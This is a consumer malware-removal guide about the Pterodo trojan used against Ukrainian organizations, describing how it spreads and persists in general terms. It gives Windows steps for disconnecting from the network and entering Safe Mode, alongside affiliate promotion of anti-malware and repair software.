Pterodo malware (virus) - Free Instructions

Pterodo malware Removal Guide

What is Pterodo malware?

Pterodo is politically motivated malware related to cyberattacks against Ukraine

PterodoPterodo is a dangerous malware strain that targets Ukrainian organizations

Pterodo is a Trojan known in the cybersecurity landscape since at least 2014. The date is significant due to the first Russian attacks against Ukraine and the annexation of Crimea. The malware is tied to a Russian cybercriminals group known as Armageddon (also known as Shuckworm or Gamardeon) and is known to attack a number of Ukrainian organizations.

The main goal of Pterodo malware is to open a backdoor on the affected computers or networks. With the help of this functionality, it can inject secondary payloads; its main purpose remains sensitive data theft that can be used against the country in many ways.

Name Pterodo/Pteranodon
Type Trojan, backdoor
Cybercriminal group Russian cyber-espionage group Armageddon
Distribution Malicious spam email attachments, infected files
Operation Malware establishes a backdoor that can be used to deliver secondary payloads. It is ultimately used to gather sensitive company information from various Ukrainian organizations
Removal Disconnect from the network and perform a full system scan with SpyHunter 5Combo Cleaner anti-malware
System fix After malware removal, Windows crashes, errors, and similar issues can occur due to damaged system files. Employ FortectIntego to fix this damage with ease


Like any other high-threat malware strain targeting organizations, Pterodo primarily uses targeted phishing emails to begin the infiltration process. These emails are sent to employees disguised as useful messages from well-known individuals, for example, managers of people who end up opening the email. Email spoofing is an established technique that easily helps the malware breakthrough into various businesses and organizations.

The email attachments are often booby-trapped with macro-laced code, which, once opened, would be executed. Thus, not allowing documents to execute macros would prevent the infiltration of malware. Adequate anti-malware solutions and adequate staff security training can significantly reduce the probability of infections.

Pterodo malware can also be spread using alternative methods, including drive-by downloads, repacked installers, crack tools, insecure RDP[1] connections, and more.


As explained by Symantec security researchers,[2] the attack on the system begins with an execution of a malicious VBS file, (a backdoor component of Pterodo malware), which is used to download malicious files from a predetermined URL. Upon entry, the malware creates a scheduled task that can ensure persistence. Later, a malicious HTA file is downloaded and executed via the mshta.exe, which can execute Microsoft HTML Application files and bypass application control solutions.

Pterodo virusThe main goal of Pterodo is to steal sensitive data and deliver secondary payloads

After establishing the communication means with a remote C&C server, hackers deliver multiple variants of Pterodo malware. It establishes a VNC client – the main vector of the attack – that can be used for various data gathering, including private company documents with descriptions, account passwords, or other sensitive information.

Pterodo removal steps

Anti-malware solutions at the best means of protection against dangerous malware attacks. However, since the Trojan is known to use living-off-the-land[3] and similar obfuscation techniques so it might be difficult to spot and remove. The first step of malware removal is removing the affected machine from the network. In order to disconnect several computers at the same time, follow these steps:

  • Type in Control Panel in Windows search and press Enter
  • Go to Network and InternetNetwork and internet
  • Click Network and Sharing CenterNetwork and internet 2
  • On the left, pick Change adapter settingsNetwork and internet 3
  • Right-click on your connection (for example, Ethernet), and select DisableNetwork and internet 4
  • Confirm with Yes.

Once the device is disconnected, you should begin a full system scan with SpyHunter 5Combo Cleaner, Malwarebytes, or another powerful anti-malware software. In some cases, it is better to perform a scan in Safe Mode to ensure that the virus does not tamper with the elimination process. To access it, proceed with the following steps:

Windows 7 / Vista / XP

  1. Click Start > Shutdown > Restart > OK.
  2. When your computer becomes active, start pressing the F8 button (if that does not work, try F2, F12, Del, etc. – it all depends on your motherboard model) multiple times until you see the Advanced Boot Options window.
  3. Select Safe Mode with Networking from the list.Windows XP/7

Windows 10 / Windows 8

  1. Right-click on the Start button and select Settings.
  2. Scroll down to pick Update & Security.
  3. On the left side of the window, pick Recovery.
  4. Now scroll down to find the Advanced Startup section.
  5. Click Restart now.
  6. Select Troubleshoot.Choose an option
  7. Go to Advanced options.Advanced options
  8. Select Startup Settings.Startup settings
  9. Click Restart.
  10. Press 5 or click 5) Enable Safe Mode with Networking.

Malware can cause tremendous damage to Windows systems to the point where a full reinstallation could be required. For example, an infection can alter the Windows registry, damage vital bootup, and other sections, delete or corrupt DLL files, etc. Antivirus software can't repair damaged files, and a specialized app should be used instead.

  • Download FortectIntego
  • Click on the ReimageRepair.exe
    Reimage download
  • If User Account Control (UAC) shows up, select Yes
  • Press Install and wait till the program finishes the installation processReimage installation
  • The analysis of your machine will begin immediatelyReimage scan
  • Once complete, check the results – they will be listed in the Summary
  • You can now click on each of the issues and fix them manually
  • If you see many problems that you find difficult to fix, we recommend you purchase the license and fix them automatically.Reimage results

By employing this tool, you would not have to worry about future computer issues, as most of them could be fixed quickly by performing a full system scan at any time. Most importantly, you could avoid the tedious process of Windows reinstallation in case things go very wrong due to one reason or another.

do it now!
Fortect Happiness
Intego Happiness
Compatible with Microsoft Windows Compatible with macOS
What to do if failed?
If you failed to fix virus damage using Fortect Intego, submit a question to our support team and provide as much details as possible.
Fortect Intego has a free limited scanner. Fortect Intego offers more through scan when you purchase its full version. When free scanner detects issues, you can fix them using free manual repairs or you can decide to purchase the full version in order to fix them automatically.
Alternative Software
Different software has a different purpose. If you didn’t succeed in fixing corrupted files with Fortect, try running SpyHunter 5.
Alternative Software
Different software has a different purpose. If you didn’t succeed in fixing corrupted files with Intego, try running Combo Cleaner.

How to prevent from getting trojans

Choose a proper web browser and improve your safety with a VPN tool

Online spying has got momentum in recent years and people are getting more and more interested in how to protect their privacy online. One of the basic means to add a layer of security – choose the most private and secure web browser. Although web browsers can't grant full privacy protection and security, some of them are much better at sandboxing, HTTPS upgrading, active content blocking, tracking blocking, phishing protection, and similar privacy-oriented features. However, if you want true anonymity, we suggest you employ a powerful Private Internet Access VPN – it can encrypt all the traffic that comes and goes out of your computer, preventing tracking completely.


Lost your files? Use data recovery software

While some files located on any computer are replaceable or useless, others can be extremely valuable. Family photos, work documents, school projects – these are types of files that we don't want to lose. Unfortunately, there are many ways how unexpected data loss can occur: power cuts, Blue Screen of Death errors, hardware failures, crypto-malware attack, or even accidental deletion.

To ensure that all the files remain intact, you should prepare regular data backups. You can choose cloud-based or physical copies you could restore from later in case of a disaster. If your backups were lost as well or you never bothered to prepare any, Data Recovery Pro can be your only hope to retrieve your invaluable files.

About the author
Ugnius Kiguolis
Ugnius Kiguolis - The mastermind

If this free guide helped you and you are satisfied with our service, please consider making a donation to keep this service alive. Even a smallest amount will be appreciated.

Contact Ugnius Kiguolis
About the company Esolutions